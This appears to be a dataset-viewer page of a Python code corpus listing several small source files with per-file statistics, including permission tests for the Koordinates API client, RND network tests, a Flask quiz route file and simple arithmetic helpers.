"Location": "https://test.koordinates.com/services/api/v1/sets/%s/permissions/%s/"
% (set_.id, "34")
},
)
base_url = client.get_url("SET", "GET", "single", {"id": set_.id})
target_url = base_url + client.get_url_path(
"PERMISSION", "GET", "single", {"permission_id": 34}
)
responses.add(
responses.GET, target_url, body=set_permission_simulated_response, status=200
)
permission = Permission()
permission.group = "34"
permission.permission = "edit"
response = set_.permissions.create(permission)
assert response.id == permission.id
assert response.permission == permission.permission
assert isinstance(response, Permission)
assert isinstance(response.group, Group)
assert 34 == permission.group.id
def test_set_set_permissions(responses, client, set_):
base_url = client.get_url("SET", "GET", "single", {"id": set_.id})
target_url = base_url + client.get_url_path("PERMISSION", "PUT", "multi")
responses.add(
responses.PUT,
target_url,
body=set_list_permissions_good_simulated_response,
status=201,
)
base_url = client.get_url("SET", "GET", "single", {"id": set_.id})
target_url = base_url + client.get_url_path("PERMISSION", "GET", "multi")
responses.add(
responses.GET,
target_url,
body=set_list_permissions_good_simulated_response,
status=200,
content_type="application/json",
)
data = [
{"permission": "admin", "user": "4"},
{"permission": "admin", "group": "administrators"},
{"permission": "view", "group": "everyone"},
]
cnt_permissions_returned = 0
for obj in set_.permissions.set(data):
assert isinstance(obj, Permission)
assert obj.permission in ["admin", "view"]
if obj.group:
assert isinstance(obj.group, Group)
assert (
obj.group.url
== "https://test.koordinates.com/services/api/v1/groups/%s/"
% obj.group.id
)
elif obj.user:
assert isinstance(obj.user, User)
assert (
obj.user.url
== "https://test.koordinates.com/services/api/v1/users/%s/"
% obj.user.id
)
cnt_permissions_returned += 1
assert cnt_permissions_returned == 3
def test_get_set_permission(responses, client, set_):
base_url = client.get_url("SET", "GET", "single", {"id": set_.id})
target_url = base_url + client.get_url_path(
"PERMISSION", "GET", "single", {"permission_id": 34}
)
responses.add(
responses.GET, target_url, body=set_permission_simulated_response, status=200
)
response = set_.permissions.get(34)
assert response.id == "group.34"
assert isinstance(response, Permission)
assert isinstance(response.group, Group)
assert 34 == response.group.id
def test_list_source_permissions(responses, client, source):
base_url = client.get_url("SOURCE", "GET", "single", {"id": source.id})
target_url = base_url + client.get_url_path("PERMISSION", "GET", "multi")
responses.add(
responses.GET,
target_url,
body=source_list_permissions_good_simulated_response,
status=200,
content_type="application/json",
)
cnt_permissions_returned = 0
for obj in source.permissions.list():
assert isinstance(obj, Permission)
assert obj.permission in ["admin", "view"]
if obj.group:
assert isinstance(obj.group, Group)
assert (
obj.group.url
== "https://test.koordinates.com/services/api/v1/groups/%s/"
% obj.group.id
)
elif obj.user:
assert isinstance(obj.user, User)
assert (
obj.user.url
== "https://test.koordinates.com/services/api/v1/users/%s/"
% obj.user.id
)
cnt_permissions_returned += 1
assert cnt_permissions_returned == 3
def test_create_source_permission(responses, client, source):
base_url = client.get_url("SOURCE", "GET", "single", {"id": source.id})
target_url = base_url + client.get_url_path("PERMISSION", "POST", "single")
responses.add(
responses.POST,
target_url,
body=source_permission_simulated_response,
status=201,
adding_headers={
"Location": "https://test.koordinates.com/services/api/v1/sources/%s/permissions/%s/"
% (source.id, "85")
},
)
base_url = client.get_url("SOURCE", "GET", "single", {"id": source.id})
target_url = base_url + client.get_url_path(
"PERMISSION", "GET", "single", {"permission_id": 85}
)
responses.add(
responses.GET, target_url, body=source_permission_simulated_response, status=200
)
permission = Permission()
permission.group = "85"
permission.permission = "download"
response = source.permissions.create(permission)
assert response.id == permission.id
assert response.permission == permission.permission
assert isinstance(response, Permission)
assert isinstance(response.group, Group)
assert 85 == permission.group.id
def test_source_set_permissions(responses, client, source):
base_url = client.get_url("SOURCE", "GET", "single", {"id": source.id})
target_url = base_url + client.get_url_path("PERMISSION", "PUT", "multi")
responses.add(
responses.PUT,
target_url,
body=source_list_permissions_good_simulated_response,
status=201,
)
base_url = client.get_url("SOURCE", "GET", "single", {"id": source.id})
target_url = base_url + client.get_url_path("PERMISSION", "GET", "multi")
responses.add(
responses.GET,
target_url,
body=source_list_permissions_good_simulated_response,
status=200,
content_type="application/json",
)
data = [
{"permission": "admin", "user": "4"},
{"permission": "admin", "group": "administrators"},
{"permission": "view", "group": "everyone"},
]
cnt_permissions_returned = 0
for obj in source.permissions.set(data):
assert isinstance(obj, Permission)
assert obj.permission in ["admin", "view"]
if obj.group:
assert isinstance(obj.group, Group)
assert (
obj.group.url
== "https://test.koordinates.com/services/api/v1/groups/%s/"
% obj.group.id
)
elif obj.user:
assert isinstance(obj.user, User)
assert (
obj.user.url
== "https://test.koordinates.com/services/api/v1/users/%s/"
% obj.user.id
)
cnt_permissions_returned += 1
assert cnt_permissions_returned == 3
def test_source_layer_permission(responses, client, source):
base_url = client.get_url("SOURCE", "GET", "single", {"id": source.id})
target_url = base_url + client.get_url_path(
"PERMISSION", "GET", "single", {"permission_id": 85}
)
responses.add(
responses.GET, target_url, body=source_permission_simulated_response, status=200
)
response = source.permissions.get(85)
assert response.id == "group.85"
assert isinstance(response, Permission)
assert isinstance(response.group, Group)
assert 85 == response.group.id
| 32.449664
| 97
| 0.635781
| 1,666
| 14,505
| 5.321729
| 0.057023
| 0.039589
| 0.052786
| 0.064967
| 0.886533
| 0.877848
| 0.850214
| 0.838033
| 0.804196
| 0.773066
| 0
| 0.016484
| 0.238814
| 14,505
| 446
| 98
| 32.522422
| 0.786523
| 0.000965
| 0
| 0.66756
| 0
| 0.008043
| 0.136251
| 0
| 0
| 0
| 0
| 0
| 0.179625
| 1
| 0.045576
| false
| 0
| 0.02681
| 0.002681
| 0.075067
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1355244f7bcee410d7a117b37ae3ee7f333497ba
| 49
|
py
|
Python
|
configtamer/__init__.py
|
rbp/configtamer
|
eab874b0bc09235ed784c55c958c462c973a4e33
|
[
"Apache-2.0"
] | 8
|
2015-04-09T01:03:12.000Z
|
2020-12-18T10:38:37.000Z
|
configtamer/__init__.py
|
rbp/configtamer
|
eab874b0bc09235ed784c55c958c462c973a4e33
|
[
"Apache-2.0"
] | 2
|
2015-04-09T01:07:10.000Z
|
2016-12-02T01:07:23.000Z
|
configtamer/__init__.py
|
rbp/configtamer
|
eab874b0bc09235ed784c55c958c462c973a4e33
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from .parser import parse
| 12.25
| 25
| 0.734694
| 8
| 49
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 49
| 3
| 26
| 16.333333
| 0.857143
| 0.408163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13b34d335bbed7d7adacbb3f468e30f1e9391c74
| 2,021
|
py
|
Python
|
jorldy/test/core/network/test_rnd_network.py
|
Kyushik/JORLDY
|
6a24a2195e5e87ade157ee53f631af2221f0a188
|
[
"Apache-2.0"
] | 300
|
2021-11-03T07:06:34.000Z
|
2022-03-24T02:23:56.000Z
|
jorldy/test/core/network/test_rnd_network.py
|
Kyushik/JORLDY
|
6a24a2195e5e87ade157ee53f631af2221f0a188
|
[
"Apache-2.0"
] | 37
|
2021-11-04T04:31:07.000Z
|
2022-03-30T01:40:49.000Z
|
jorldy/test/core/network/test_rnd_network.py
|
Kyushik/JORLDY
|
6a24a2195e5e87ade157ee53f631af2221f0a188
|
[
"Apache-2.0"
] | 45
|
2021-11-03T08:05:56.000Z
|
2022-03-24T08:35:05.000Z
|
import torch
from core.network.rnd import RND_MLP, RND_CNN, RND_Multi
def test_rnd_mlp_call():
D_in, D_out, D_hidden = 2, 3, 4
num_workers, gamma_i = 2, 0.99
net = RND_MLP(
D_in=D_in,
D_out=D_out,
D_hidden=D_hidden,
num_workers=num_workers,
gamma_i=gamma_i,
)
batch_size = 5
mock_input = [
torch.rand((batch_size * num_workers, D_in)),
]
out = net(*mock_input, update_ri=True)
assert out.shape == (batch_size * num_workers, 1)
mock_input = [
torch.rand((batch_size, D_in)),
]
out = net(*mock_input, update_ri=False)
assert out.shape == (batch_size, 1)
def test_rnd_cnn_call():
D_in, D_out, D_hidden = [3, 36, 36], 3, 4
num_workers, gamma_i = 2, 0.99
net = RND_CNN(
D_in=D_in,
D_out=D_out,
D_hidden=D_hidden,
num_workers=num_workers,
gamma_i=gamma_i,
)
batch_size = 5
mock_input = [
torch.rand((batch_size * num_workers, *D_in)),
]
out = net(*mock_input, update_ri=True)
assert out.shape == (batch_size * num_workers, 1)
mock_input = [
torch.rand((batch_size, *D_in)),
]
out = net(*mock_input, update_ri=False)
assert out.shape == (batch_size, 1)
def test_rnd_multi_call():
D_in, D_out, D_hidden = [[3, 36, 36], 2], 3, 4
num_workers, gamma_i = 2, 0.99
net = RND_Multi(
D_in=D_in,
D_out=D_out,
D_hidden=D_hidden,
num_workers=num_workers,
gamma_i=gamma_i,
)
batch_size = 5
mock_input = [
[
torch.rand((batch_size * num_workers, *D_in[0])),
torch.rand((batch_size * num_workers, D_in[1])),
],
]
out = net(*mock_input, update_ri=True)
assert out.shape == (batch_size * num_workers, 1)
mock_input = [
[torch.rand((batch_size, *D_in[0])), torch.rand((batch_size, D_in[1]))],
]
out = net(*mock_input, update_ri=False)
assert out.shape == (batch_size, 1)
| 22.965909
| 80
| 0.584859
| 315
| 2,021
| 3.403175
| 0.126984
| 0.047575
| 0.033582
| 0.134328
| 0.918843
| 0.918843
| 0.918843
| 0.883396
| 0.857276
| 0.849813
| 0
| 0.029758
| 0.285007
| 2,021
| 87
| 81
| 23.229885
| 0.712111
| 0
| 0
| 0.573529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 1
| 0.044118
| false
| 0
| 0.029412
| 0
| 0.073529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
13b4619f8f8fc3e569b787d7c4a8007a329fd8ac
| 617
|
py
|
Python
|
data_prep_scripts/openslr_pre_manifest.py
|
jagadeesh6jaga/indicAsr--inference
|
569f867ed2d72cbd225f83d9b004666cf5c76c35
|
[
"MIT"
] | 8
|
2021-12-11T12:26:20.000Z
|
2022-03-22T13:38:42.000Z
|
data_prep_scripts/openslr_pre_manifest.py
|
jagadeesh6jaga/indicAsr--inference
|
569f867ed2d72cbd225f83d9b004666cf5c76c35
|
[
"MIT"
] | 15
|
2022-01-08T11:59:49.000Z
|
2022-03-26T15:52:36.000Z
|
data_prep_scripts/openslr_pre_manifest.py
|
jagadeesh6jaga/indicAsr--inference
|
569f867ed2d72cbd225f83d9b004666cf5c76c35
|
[
"MIT"
] | 2
|
2022-01-27T22:58:04.000Z
|
2022-02-22T09:53:50.000Z
|
basepath = "<path to dataset>"
with open(basepath+"/**/train_bg/wav.scp") as f:
lines = f.read().strip().split('\n')
for line in tqdm.tqdm(lines):
# name, _ = line.strip().split('\t')
name = line.strip().split(' ')[0]
shutil.copy(basepath+"/audio/"+name+".flac", basepath+"/**/train_wav/"+name+".flac")
with open(basepath+"/**/dev_bg/wav.scp") as f:
lines = f.read().strip().split('\n')
for line in tqdm.tqdm(lines):
# name, _ = line.strip().split('\t')
name = line.strip().split(' ')[0]
shutil.copy(basepath+"/audio/"+name+".flac", basepath+"/**/valid_wav/"+name+".flac")
| 34.277778
| 88
| 0.585089
| 88
| 617
| 4.034091
| 0.340909
| 0.169014
| 0.146479
| 0.202817
| 0.738028
| 0.738028
| 0.738028
| 0.738028
| 0.738028
| 0.738028
| 0
| 0.003817
| 0.150729
| 617
| 17
| 89
| 36.294118
| 0.673664
| 0.118314
| 0
| 0.545455
| 0
| 0
| 0.22905
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b914ef66c8e65bcb22798182d7cf066e49fec617
| 147
|
py
|
Python
|
sandbox/benchmarking_wrappers/sum_of_squares_ctypes.py
|
IgnitionProject/ignition
|
0eeb3a7878d828bc3c06d2cb2dd781e17776a8a6
|
[
"BSD-2-Clause-FreeBSD"
] | 7
|
2015-01-25T18:15:48.000Z
|
2022-03-09T17:39:12.000Z
|
sandbox/benchmarking_wrappers/sum_of_squares_ctypes.py
|
IgnitionProject/ignition
|
0eeb3a7878d828bc3c06d2cb2dd781e17776a8a6
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
sandbox/benchmarking_wrappers/sum_of_squares_ctypes.py
|
IgnitionProject/ignition
|
0eeb3a7878d828bc3c06d2cb2dd781e17776a8a6
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
from ctypes import cdll
sum_lib = cdll.LoadLibrary('./libsum_of_squares.so')
def sum_of_squares_ctypes(N):
return sum_lib.sum_of_squares(N)
| 18.375
| 52
| 0.77551
| 25
| 147
| 4.2
| 0.56
| 0.257143
| 0.228571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122449
| 147
| 7
| 53
| 21
| 0.813953
| 0
| 0
| 0
| 0
| 0
| 0.150685
| 0.150685
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
b932c3683277208ee21db96d2e84097cd70ffa68
| 25
|
py
|
Python
|
Lib/test/test_compiler/testcorpus/22_func_arg.py
|
diogommartins/cinder
|
79103e9119cbecef3b085ccf2878f00c26e1d175
|
[
"CNRI-Python-GPL-Compatible"
] | 1,886
|
2021-05-03T23:58:43.000Z
|
2022-03-31T19:15:58.000Z
|
Lib/test/test_compiler/testcorpus/22_func_arg.py
|
diogommartins/cinder
|
79103e9119cbecef3b085ccf2878f00c26e1d175
|
[
"CNRI-Python-GPL-Compatible"
] | 70
|
2021-05-04T23:25:35.000Z
|
2022-03-31T18:42:08.000Z
|
Lib/test/test_compiler/testcorpus/22_func_arg.py
|
diogommartins/cinder
|
79103e9119cbecef3b085ccf2878f00c26e1d175
|
[
"CNRI-Python-GPL-Compatible"
] | 52
|
2021-05-04T21:26:03.000Z
|
2022-03-08T18:02:56.000Z
|
def foo(a, b):
a + b
| 8.333333
| 14
| 0.4
| 6
| 25
| 1.666667
| 0.666667
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 25
| 2
| 15
| 12.5
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b9583727eec60b90342a78a767f36b5df33c0c86
| 272
|
py
|
Python
|
app/quiz/views.py
|
gibran-abdillah/quiz-app
|
6a346c87c5cc258aa42f8805f226b1119fbf60e6
|
[
"Apache-2.0"
] | 10
|
2021-12-24T09:02:00.000Z
|
2022-02-08T06:54:45.000Z
|
app/quiz/views.py
|
gibran-abdillah/quiz-app
|
6a346c87c5cc258aa42f8805f226b1119fbf60e6
|
[
"Apache-2.0"
] | null | null | null |
app/quiz/views.py
|
gibran-abdillah/quiz-app
|
6a346c87c5cc258aa42f8805f226b1119fbf60e6
|
[
"Apache-2.0"
] | null | null | null |
from app.quiz import quiz_blueprint as quiz
from flask import render_template
@quiz.route('/start/<code>')
def quiz_homepage(code):
return render_template('quiz/index.html')
@quiz.route('/')
def index_quiz():
return render_template('quiz/landing-page.html')
| 27.2
| 52
| 0.738971
| 39
| 272
| 5
| 0.487179
| 0.215385
| 0.276923
| 0.246154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 272
| 10
| 52
| 27.2
| 0.819328
| 0
| 0
| 0
| 0
| 0
| 0.186813
| 0.080586
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0.125
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
b976d363e4ce0189862218855d9115bcdd429b89
| 179
|
py
|
Python
|
flambe/cluster/__init__.py
|
ethan-asapp/flambe
|
70257167058c7b82ee39f74167a6161bd264ad18
|
[
"MIT"
] | 148
|
2019-08-29T21:19:03.000Z
|
2022-03-18T06:13:53.000Z
|
flambe/cluster/__init__.py
|
cle-ros/flambe
|
0dc2f5b2b286694defe8abf450fe5be9ae12c097
|
[
"MIT"
] | 108
|
2019-09-03T14:36:10.000Z
|
2020-05-13T15:53:14.000Z
|
flambe/cluster/__init__.py
|
cle-ros/flambe
|
0dc2f5b2b286694defe8abf450fe5be9ae12c097
|
[
"MIT"
] | 21
|
2019-09-08T14:09:45.000Z
|
2020-12-27T04:12:33.000Z
|
from flambe.cluster.cluster import Cluster
from flambe.cluster.aws import AWSCluster
from flambe.cluster.ssh import SSHCluster
__all__ = ['Cluster', 'AWSCluster', 'SSHCluster']
| 25.571429
| 49
| 0.798883
| 22
| 179
| 6.318182
| 0.409091
| 0.215827
| 0.366906
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106145
| 179
| 6
| 50
| 29.833333
| 0.86875
| 0
| 0
| 0
| 0
| 0
| 0.150838
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b978c22bc009180503eb2e1d794aa5e91adb680b
| 355
|
py
|
Python
|
Aula 10/Aula10.py
|
Katakhan/TrabalhosPython2
|
ab47af0ff3c00922857578e58a1a149d9e65e229
|
[
"MIT"
] | null | null | null |
Aula 10/Aula10.py
|
Katakhan/TrabalhosPython2
|
ab47af0ff3c00922857578e58a1a149d9e65e229
|
[
"MIT"
] | null | null | null |
Aula 10/Aula10.py
|
Katakhan/TrabalhosPython2
|
ab47af0ff3c00922857578e58a1a149d9e65e229
|
[
"MIT"
] | null | null | null |
def cadicao(n1,n2):
return n1 + n2
def csubtracao (n1,n2):
return n1 - n2
def cdivisao (n1,n2):
return n1 / n2
def cdivisaoint (n1,n2):
return n1 // n2
def cmultiplicacao (n1,n2):
return n1 * n2
def cpotenciacao(n1,n2):
return n1 ** n2
def craiz (n1,n2):
return n1 ** (1/n2)
def cresto (n1,n2):
return n1 % n2
| 14.2
| 27
| 0.591549
| 57
| 355
| 3.684211
| 0.22807
| 0.285714
| 0.380952
| 0.457143
| 0.552381
| 0.485714
| 0
| 0
| 0
| 0
| 0
| 0.128906
| 0.278873
| 355
| 24
| 28
| 14.791667
| 0.691406
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
b993811f4653d9f60636fd1212316c604f2fcae0
| 230
|
py
|
Python
|
tests/sneks/test_normal_snek.py
|
ARMcK-hub/template-python
|
c5e8c48fc92dde522f91227189a3d4822c86d170
|
[
"MIT"
] | null | null | null |
tests/sneks/test_normal_snek.py
|
ARMcK-hub/template-python
|
c5e8c48fc92dde522f91227189a3d4822c86d170
|
[
"MIT"
] | 2
|
2022-02-24T02:58:57.000Z
|
2022-02-24T02:59:15.000Z
|
tests/sneks/test_normal_snek.py
|
ARMcK-hub/template-pyspark
|
d5ba2e0175cab449b2a3b345b2be8978a7d238a3
|
[
"MIT"
] | null | null | null |
from snek_case.sneks import NormalSnek
def test_can_create() -> None:
# Assemble / Act / Assert
NormalSnek()
def test_type_is_normal() -> None:
# Assemble / Act / Assert
assert NormalSnek.snek_type == "normal"
| 19.166667
| 43
| 0.682609
| 29
| 230
| 5.172414
| 0.586207
| 0.173333
| 0.226667
| 0.28
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.213043
| 230
| 11
| 44
| 20.909091
| 0.828729
| 0.204348
| 0
| 0
| 0
| 0
| 0.033333
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
b99a36e91679322574a52540e845a56c6daafb97
| 365
|
py
|
Python
|
src/api/domain/operation/GetDataOperationJobExecutionLogList/GetDataOperationJobExecutionLogListResponse.py
|
PythonDataIntegrator/pythondataintegrator
|
6167778c36c2295e36199ac0d4d256a4a0c28d7a
|
[
"MIT"
] | 14
|
2020-12-19T15:06:13.000Z
|
2022-01-12T19:52:17.000Z
|
src/api/domain/operation/GetDataOperationJobExecutionLogList/GetDataOperationJobExecutionLogListResponse.py
|
PythonDataIntegrator/pythondataintegrator
|
6167778c36c2295e36199ac0d4d256a4a0c28d7a
|
[
"MIT"
] | 43
|
2021-01-06T22:05:22.000Z
|
2022-03-10T10:30:30.000Z
|
src/api/domain/operation/GetDataOperationJobExecutionLogList/GetDataOperationJobExecutionLogListResponse.py
|
PythonDataIntegrator/pythondataintegrator
|
6167778c36c2295e36199ac0d4d256a4a0c28d7a
|
[
"MIT"
] | 4
|
2020-12-18T23:10:09.000Z
|
2021-04-02T13:03:12.000Z
|
from typing import List
from infrastructure.cqrs.decorators.responseclass import responseclass
from domain.operation.GetDataOperationJobExecutionLogList.GetDataOperationJobExecutionLogListDto import GetDataOperationJobExecutionLogListDto
@responseclass
class GetDataOperationJobExecutionLogListResponse:
Data: List[GetDataOperationJobExecutionLogListDto] = None
| 40.555556
| 142
| 0.906849
| 25
| 365
| 13.24
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060274
| 365
| 8
| 143
| 45.625
| 0.965015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.833333
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b9a506d6f526c62204062cfa1e0bf5c6f05f4d6f
| 34
|
py
|
Python
|
database_app.py
|
kneeraazon01/SqlitePython
|
decf049bd75ecc44f5343837db2cef0d552048c2
|
[
"Apache-2.0"
] | null | null | null |
database_app.py
|
kneeraazon01/SqlitePython
|
decf049bd75ecc44f5343837db2cef0d552048c2
|
[
"Apache-2.0"
] | null | null | null |
database_app.py
|
kneeraazon01/SqlitePython
|
decf049bd75ecc44f5343837db2cef0d552048c2
|
[
"Apache-2.0"
] | null | null | null |
import our_db
our_db.show_all()
| 6.8
| 17
| 0.764706
| 7
| 34
| 3.285714
| 0.714286
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147059
| 34
| 5
| 17
| 6.8
| 0.793103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.